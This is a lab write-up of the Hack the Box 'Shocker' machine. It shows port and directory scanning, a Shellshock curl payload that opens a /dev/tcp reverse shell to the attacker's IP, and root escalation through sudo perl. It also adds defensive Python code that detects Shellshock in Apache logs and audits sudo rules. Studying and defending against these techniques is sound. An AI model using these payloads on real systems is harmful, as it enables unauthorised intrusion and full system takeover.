Hack the Box - Shocker - Walkthrough

Introduction

Today we're going to be doing a pentest walkthrough of the Shocker machine hosted at https://hackthebox.eu. For this pentest, we'll be using a Kali Linux virtual machine as our attacking system and the Shocker machine as the victim system. After connecting to the Hack the Box network via VPN, we see that our target is located at 10.129.1.175.

Scanning and Enumeration

We'll start by scanning for open ports with Nmap:

sudo nmap -T4 -p- 10.129.1.175


Now we'll do another Nmap scan, this time specifying the ports and picking up service names and version numbers:

sudo nmap -T4 -p80,2222 10.129.1.175


There's an Apache webserver on port 80, so let's enumerate web directories with Gobuster:

gobuster dir -u http://10.129.1.175/ -w /usr/share/wordlists/dirb/big.txt -x php,txt,html -r -s 200,204,301,302,307,403



An easy win on Linux systems is the Shellshock vulnerability, which requires access to the web server's /cgi-bin directory. Here, the /cgi-bin/ directory came back with a 403 error, which indicates that the directory exists, but we can't access it directly. Let's see if we can find any scripts inside that directory. We'll use Gobuster again:

gobuster dir -u http://10.129.1.175/cgi-bin/ -w /usr/share/wordlists/dirb/big.txt -x php,sh -r -s 200,204,301,302,307,403



Finding a Way In

We've found a valid script file on the target's webserver, which means we can test it for the Shellshock vulnerability. We'll use cURL to send a Shellshock test request:

curl -H 'User-Agent: () { :; }; echo ; echo ; echo VULNERABLE' http://10.129.1.175/cgi-bin/user.sh


Since VULNERABLE was included in the output, that's a good indication that this target is vulnerable to Shellshock. That means we can use the Shellshock exploit to get a foothold on the target by opening a reverse shell to our attacking system. But first we need to start a Netcat listener on our attacking machine.

sudo nc -nlvp 443


And now to open the reverse shell via cURL:

curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.10.99.99/443 0>&1' http://10.129.1.175/cgi-bin/user.sh
whoami

<snipped>
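
A defender's view of the same probe, added here as an example and not part of the original post: the function-definition signature that the curl test places in the User-Agent header is written verbatim into Apache's combined access log, so a Shellshock attempt against a CGI path can be flagged after the fact. The parser, the severity labels and the sample log lines are this example's own assumptions; the client IP and timestamps are constructed and only mirror the requests made in the write-up.

```python
"""Flag Shellshock (CVE-2014-6271) probes in Apache 'combined' access logs.

Added example for this walkthrough, not part of the original post. The log
lines in SAMPLE_LOG are constructed; the client IP and timestamps are made up.
"""
import re
from dataclasses import dataclass
from typing import Optional

# Apache "combined" LogFormat:
#   %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
COMBINED_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# A Shellshock payload is an exported bash function definition "() { ... };"
# followed by the command that a vulnerable bash runs when importing it.
# Whitespace varies between tools, so the signature is matched loosely.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{.*?\}\s*;\s*\S')


@dataclass
class Finding:
    client: str
    path: str
    status: str
    field: str      # which header carried the payload
    value: str
    severity: str   # "high" when aimed at a CGI path, else "medium" (sprayed/scanner noise)


def parse_line(line: str) -> Optional[dict]:
    """Split one combined-format line into its fields, or None if malformed."""
    m = COMBINED_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def is_shellshock(value: str) -> bool:
    """True if a header value carries the Shellshock function-definition pattern."""
    return SHELLSHOCK_RE.search(value) is not None


def scan(lines) -> list:
    """Return a Finding for every request whose User-Agent or Referer carries a payload."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # not a combined-format line; skip rather than crash
        for field in ("ua", "referer"):
            if is_shellshock(rec[field]):
                severity = "high" if rec["path"].startswith("/cgi-bin/") else "medium"
                findings.append(Finding(rec["client"], rec["path"], rec["status"],
                                        field, rec[field], severity))
    return findings


# Constructed sample log: a directory brute-force hit on /cgi-bin/, a normal
# page fetch, the Shellshock test request from the walkthrough, and junk.
SAMPLE_LOG = [
    '10.10.99.99 - - [04/Jan/2021:10:00:00 +0000] "GET /cgi-bin/ HTTP/1.1" 403 298 "-" "gobuster/3.1.0"',
    '10.10.99.99 - - [04/Jan/2021:10:00:05 +0000] "GET /index.html HTTP/1.1" 200 137 "-" "curl/7.74.0"',
    '10.10.99.99 - - [04/Jan/2021:10:00:09 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "() { :; }; echo ; echo ; echo VULNERABLE"',
    'not a log line at all',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"[{f.severity}] {f.client} -> {f.path} ({f.status}) via {f.field}: {f.value}")
```

One caveat when running this over real logs: Apache escapes embedded double quotes in header values as `\"`, and the simple `[^"]*` field pattern above stops at the first one, so lines with quoted User-Agents would fail to parse and be skipped rather than flagged. A 403 on /cgi-bin/ followed by a 200 on a script under it, as in the sample, is the sequence worth alerting on.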

Capturing the User Flag

Before moving on, we'll take this opportunity to collect the User flag. On Hack the Box Linux machines, it's usually located in a user's /home directory.

cat /home/shelly/user.txt


Privilege Escalation

We're logged in as the shelly user, who appears to be an admin on the system. Let's check what their sudo privileges are:

sudo -l


If we have sudo privileges with perl, we can use it to open a shell with root access by supplying the following command:

sudo perl -e 'exec "/bin/sh";'
whoami
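
The mitigation side of this step, as an added example that is not part of the original post: a small audit that reads sudo -l output and flags rules granting root an interpreter that can be told to exec a shell (perl, as above, or a shell binary itself). The parsing, the SHELL_CAPABLE set and the sample output are this example's own assumptions; the sample is constructed to resemble sudo's format and is not the machine's real output.

```python
"""Audit 'sudo -l' output for rules that let a user escalate through an interpreter.

Added example for this walkthrough, not part of the original post. SAMPLE_SUDO_L
is constructed to resemble sudo's output; the hostname and second rule are made up.
"""
import os
import re
from typing import Dict, List, Optional

# Binaries named on this page that can be told to exec a shell; extend per policy.
SHELL_CAPABLE = {"perl", "sh", "bash"}

RULE_RE = re.compile(
    r'^\s*\((?P<runas>[^)]+)\)\s*'   # (root) or (ALL : ALL)
    r'(?P<tags>(?:[A-Z]+:\s*)*)'     # NOPASSWD:, SETENV:, ...
    r'(?P<cmds>.+?)\s*$'             # comma-separated command list
)


def parse_rules(sudo_l_output: str) -> List[Dict]:
    """Extract one record per (runas, command) pair from 'sudo -l' text."""
    rules = []
    for line in sudo_l_output.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue  # Defaults lines, headers and blank lines carry no rule
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        runas_user = m.group("runas").split(":")[0].strip()
        for cmd in m.group("cmds").split(","):
            rules.append({
                "runas": runas_user,
                "command": cmd.strip(),
                "nopasswd": "NOPASSWD" in tags,
            })
    return rules


def classify(command: str) -> Optional[str]:
    """Why a command is risky when run as root, or None if the rule looks harmless."""
    if command == "ALL":
        return "any command"
    parts = command.split()
    # sudo pins the arguments when the rule spells them out; a bare interpreter
    # path lets the caller pass anything, including an exec of a shell.
    if len(parts) == 1 and os.path.basename(parts[0]) in SHELL_CAPABLE:
        return "interpreter with caller-controlled arguments"
    return None


def audit(sudo_l_output: str) -> List[Dict]:
    """Return the rules that grant root (or ALL) and can be turned into a shell."""
    findings = []
    for rule in parse_rules(sudo_l_output):
        if rule["runas"] not in ("root", "ALL"):
            continue  # running as oneself is not an escalation
        reason = classify(rule["command"])
        if reason:
            findings.append({**rule, "reason": reason})
    return findings


# Constructed sample: the perl rule from the walkthrough plus a pinned-argument
# rule that should not be flagged.
SAMPLE_SUDO_L = """\
Matching Defaults entries for shelly on example-host:
    env_reset, mail_badpass

User shelly may run the following commands on example-host:
    (root) NOPASSWD: /usr/bin/perl
    (root) /usr/bin/systemctl restart apache2
"""

if __name__ == "__main__":
    for f in audit(SAMPLE_SUDO_L):
        pw = "NOPASSWD" if f["nopasswd"] else "password required"
        print(f"({f['runas']}) {f['command']}: {f['reason']} [{pw}]")
```

The fix on the sudoers side is the mirror of the finding: grant the specific command line a user needs (as the systemctl rule does) rather than a bare interpreter, and avoid NOPASSWD for anything that reaches root.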


Capturing the Root Flag

The last thing to do is collect the Root flag. On Hack the Box Linux systems this is usually located in the /root directory:

cat /root/root.txt


Summary

After initial scans, we found that the target's webserver had a script file accessible in the /cgi-bin directory. Suspecting that the target was vulnerable to Shellshock, we tested the system and were able to gain a foothold through that exploit. Once inside, we found that the user we were logged in as had sudo privileges for the perl program, which we used to gain root access and collect the objective flag.

Finish